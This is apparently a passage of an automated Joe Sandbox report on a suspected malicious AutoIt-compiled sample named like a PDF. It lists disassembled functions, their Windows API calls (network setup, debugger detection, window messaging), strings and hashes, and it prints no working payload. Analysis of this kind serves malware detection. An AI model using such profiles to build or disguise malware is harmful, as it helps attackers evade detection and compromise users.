                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00162520
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00162549
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: 958fec56a52c705aaa79b3a1a2b7e7a1817ab05adf46e54092b94e8031f1f945
                                                            • Instruction ID: b493ff21a3a0d4ad87312187a8945a3a5496acbd94bfed1af5f945e3aec58590
                                                            • Opcode Fuzzy Hash: 958fec56a52c705aaa79b3a1a2b7e7a1817ab05adf46e54092b94e8031f1f945
                                                            • Instruction Fuzzy Hash: 8911C270541A25BEDB388F518C99EFBFF68FF06751F10812AF94656040D77069A1DAF0
                                                            Function 001680A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0016830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,001680C8,?,00000000,?,?), ref: 00168322
                                                            • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001680CB
                                                            • htons.WSOCK32(00000000,?,00000000), ref: 00168108
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 2496851823-2422070025
                                                            • Opcode ID: 4db01e6857552e2bab8d4ebe89aded49d44b46a155c1055755f2e0f7d92f9afc
                                                            • Instruction ID: 786dc8cfeba7ba28252588565b95879ebe60b472854a2d96f03a8c03f7d4b9a9
                                                            • Opcode Fuzzy Hash: 4db01e6857552e2bab8d4ebe89aded49d44b46a155c1055755f2e0f7d92f9afc
                                                            • Instruction Fuzzy Hash: 13110834100209ABCB24AF64CC46FFEB334FF15310F10861AFA1597292DB31A865C791
                                                            Function 001492E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00149355
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: b231ff597163a8c1a832031775daec03d291d928f21dba3bd873b0e2195c6297
                                                            • Instruction ID: c6956f22654bea09d3fad84014c8f1d87bfb6c7b8fc977321ba8d4db00479f92
                                                            • Opcode Fuzzy Hash: b231ff597163a8c1a832031775daec03d291d928f21dba3bd873b0e2195c6297
                                                            • Instruction Fuzzy Hash: 5401F171A45218ABCB08EFB4CC928FF7379BF06320B140619FA32572E2DB31580C9651
                                                            Function 001491DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 0014924D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 7b5686412b16554981888613bf90b96feec0b77d551d2bea8d87922ec71ed460
                                                            • Instruction ID: 09aa17eea18b3e1a71ae3af869a681fcd29cd2d9eb57026241f143ab5a1dd0ba
                                                            • Opcode Fuzzy Hash: 7b5686412b16554981888613bf90b96feec0b77d551d2bea8d87922ec71ed460
                                                            • Instruction Fuzzy Hash: 9E01A775E452087BCB08EBA4C992DFF73BC9F55300F140029BA1667692EB515F1C96B2
                                                            Function 00149264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 001492D0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 01a2b1abf76ee9f3a16fd1a1d0d02e85d8474fde99496ae9dc4e85717c02d49a
                                                            • Instruction ID: 5415ce20982ce2cca84e9e1e57fe964e1d6cb6d2a93ed38aeb25aa21372e44e0
                                                            • Opcode Fuzzy Hash: 01a2b1abf76ee9f3a16fd1a1d0d02e85d8474fde99496ae9dc4e85717c02d49a
                                                            • Instruction Fuzzy Hash: 3501D6B1E8520877CB08EBA4C982EFF77BC9F11301F240125BA1663692DB619F0C9272
                                                            Function 001551CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp
                                                            • String ID: #32770
                                                            • API String ID: 2292705959-463685578
                                                            • Opcode ID: 3429165dbf4534788204347d90306878176afd60cad6642f8c935d63678a45c7
                                                            • Instruction ID: 46549a77036c0272918de527d3a900692533314b37c0fef4988c01b769f129e8
                                                            • Opcode Fuzzy Hash: 3429165dbf4534788204347d90306878176afd60cad6642f8c935d63678a45c7
                                                            • Instruction Fuzzy Hash: 1EE0613250022D57D7209695EC05FA7F7ACEF41731F00016BFD14D3050D760998587D0
                                                            Function 001481BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001481CA
                                                              • Part of subcall function 00113598: _doexit.LIBCMT ref: 001135A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Message_doexit
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 1993061046-4017498283
                                                            • Opcode ID: 5e09e51eb5d5aa9c2c0f18e936437355677e77aa4ec35ded5690ef5446bf5dbc
                                                            • Instruction ID: 80d5666552d150cd47d820a57a95be7f60b6e6044626f9d8bb37c4a465c52526
                                                            • Opcode Fuzzy Hash: 5e09e51eb5d5aa9c2c0f18e936437355677e77aa4ec35ded5690ef5446bf5dbc
                                                            • Instruction Fuzzy Hash: 27D05B323C531C36D21432A86D0BFCB79484B19F51F104426BB08555D38FD155C243D9
                                                            Function 0012B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0012B564: _memset.LIBCMT ref: 0012B571
                                                              • Part of subcall function 00110B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0012B540,?,?,?,000F100A), ref: 00110B89
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,000F100A), ref: 0012B544
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000F100A), ref: 0012B553
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0012B54E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 3158253471-631824599
                                                            • Opcode ID: b8f650b507117a3b7e6b4abc4a2b6cbf61fc4f5bf3000378cc71c40d71716fc7
                                                            • Instruction ID: 4b1242564ec4dc36b11bd7b5c5d0a8762cf6abc01d280fac8fdff36d2dd2c8d0
                                                            • Opcode Fuzzy Hash: b8f650b507117a3b7e6b4abc4a2b6cbf61fc4f5bf3000378cc71c40d71716fc7
                                                            • Instruction Fuzzy Hash: 6BE06D706043208FD721DF28F9443827BE0BF14704F04892DE446CAA51DBB8D884CBA1
                                                            Function 00175BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00175BF5
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00175C08
                                                              • Part of subcall function 001554E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0015555E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: caa1107277266bee7c081c4c9a0f377a9ee7b472ba2f2fdc9afd5b03fc0130cd
                                                            • Instruction ID: f086cac8c92864382df2cbcb98ef0f9b99e0aaf07a2cb1ec54e29d7fe4bcbbd6
                                                            • Opcode Fuzzy Hash: caa1107277266bee7c081c4c9a0f377a9ee7b472ba2f2fdc9afd5b03fc0130cd
                                                            • Instruction Fuzzy Hash: 9CD0C935388311BAE764BB70EC1BFD76A24AB15B51F000829B659AA1D0DAE45881C650